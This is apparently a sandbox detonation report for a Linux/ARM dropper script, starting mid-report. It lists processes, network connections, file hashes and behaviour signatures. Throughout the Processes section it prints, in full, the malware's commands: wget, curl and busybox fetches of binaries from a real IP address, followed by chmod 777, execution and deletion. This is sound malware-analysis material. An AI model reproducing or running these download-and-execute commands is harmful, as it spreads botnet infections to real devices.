[curl -O http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/chmod

[chmod 777 yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv

[./yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/rm

[rm yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 216.126.231.240:80 216.126.231.240 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.65.91:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 151.101.65.91:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 84.17.50.9:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 216.126.231.240:80 216.126.231.240 tcp
GB 84.17.50.8:443 1527653184.rsc.cdn77.org tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-21 08:15

Reported

2024-11-21 08:18

Platform

debian9-armhf-20240611-en

Max time kernel

53s

Max time network

82s

Command Line

[/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB N/A
N/A /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx N/A
N/A /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo N/A
N/A /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 N/A
N/A /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X N/A
N/A /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l N/A
N/A /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc N/A
N/A /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv N/A
N/A /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc N/A
N/A /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq N/A
N/A /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ N/A
N/A /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e N/A
N/A /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t N/A
N/A /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 N/A
N/A /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc N/A
N/A /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq N/A
N/A /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ N/A
N/A /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e N/A
N/A /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t N/A
N/A /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 N/A
N/A /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB N/A
N/A /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx N/A
N/A /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo N/A
N/A /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq /usr/bin/curl N/A
File opened for modification /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ /usr/bin/curl N/A
File opened for modification /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx /usr/bin/curl N/A
File opened for modification /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo /usr/bin/curl N/A
File opened for modification /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo /usr/bin/curl N/A
File opened for modification /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc /usr/bin/curl N/A
File opened for modification /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc /usr/bin/curl N/A
File opened for modification /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq /usr/bin/curl N/A
File opened for modification /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e /usr/bin/curl N/A
File opened for modification /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t /usr/bin/curl N/A
File opened for modification /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 /usr/bin/curl N/A
File opened for modification /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc /usr/bin/curl N/A
File opened for modification /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 /usr/bin/curl N/A
File opened for modification /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 /usr/bin/curl N/A
File opened for modification /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X /usr/bin/curl N/A
File opened for modification /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e /usr/bin/curl N/A
File opened for modification /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t /usr/bin/curl N/A
File opened for modification /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB /usr/bin/curl N/A
File opened for modification /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB /usr/bin/curl N/A
File opened for modification /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx /usr/bin/curl N/A
File opened for modification /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l /usr/bin/curl N/A
File opened for modification /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv /usr/bin/curl N/A
File opened for modification /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ /usr/bin/curl N/A
File opened for modification /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 /usr/bin/curl N/A

Processes

/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh

[/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/chmod

[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB

[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/rm

[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/usr/bin/wget

[wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/chmod

[chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx

[./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/rm

[rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/usr/bin/wget

[wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/chmod

[chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo

[./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/rm

[rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/usr/bin/wget

[wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/chmod

[chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7

[./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/rm

[rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/usr/bin/wget

[wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/chmod

[chmod 777 sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X

[./sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/rm

[rm sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/usr/bin/wget

[wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/chmod

[chmod 777 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l

[./0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/rm

[rm 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/usr/bin/wget

[wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/chmod

[chmod 777 TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc

[./TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/rm

[rm TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/usr/bin/wget

[wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/chmod

[chmod 777 yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv

[./yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/rm

[rm yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/usr/bin/wget

[wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/chmod

[chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc

[./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/rm

[rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/usr/bin/wget

[wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/chmod

[chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq

[./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/rm

[rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/usr/bin/wget

[wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/chmod

[chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ

[./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/rm

[rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/chmod

[chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e

[./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/rm

[rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/usr/bin/wget

[wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/chmod

[chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t

[./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/rm

[rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/usr/bin/wget

[wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/chmod

[chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5

[./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/rm

[rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/usr/bin/wget

[wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/chmod

[chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc

[./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/rm

[rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/usr/bin/wget

[wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/chmod

[chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq

[./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/rm

[rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/usr/bin/wget

[wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/chmod

